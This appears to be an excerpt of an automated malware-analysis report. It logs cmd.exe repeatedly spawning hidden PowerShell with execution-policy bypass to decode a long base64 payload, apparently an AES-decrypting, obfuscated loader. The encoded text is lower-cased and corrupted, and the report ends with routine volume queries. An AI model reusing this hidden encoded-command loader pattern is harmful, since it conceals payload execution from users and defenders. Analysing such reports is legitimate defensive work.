jgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
